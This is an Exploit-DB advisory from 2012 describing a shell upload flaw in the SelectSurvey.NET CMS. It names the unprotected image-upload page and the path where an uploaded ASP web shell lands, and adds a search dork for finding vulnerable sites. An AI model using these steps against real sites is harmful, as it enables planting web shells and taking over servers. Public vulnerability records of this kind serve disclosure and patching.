SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload

EDB-ID:

23571

CVE:

N/A


Author:

040

Type:

webapps


Platform:

ASP

Date:

2012-12-21


=============================================================
SelectSurvey CMS (ASP.NET) Shell Upload Vulnerability
=============================================================
 
###################################################
#
# Exploit Title: SelectSurvey.NETv4 CMS (ASP.NET) Shell Upload Vulnerability
# DDate: 20/12/2012
# Author: 040
# Software Link: www.classapps.com
# Version: 3.x . 4.0
# Tested on: windows
# dork : "SelectSurvey.NETv4 site:uk"
# Contact: cyber040@hotmail.com ~ @04hazmi
#
####################################################
 
    exploit # /survey/UploadImagePopup.aspx
 
or http://survey.site.com/UploadImagePopup.aspx
 
 
  Upload to # http://site.com/UploadedImages/shell.asp
 
 
#######################################################
 

Greetz :  Matlo3a-Dz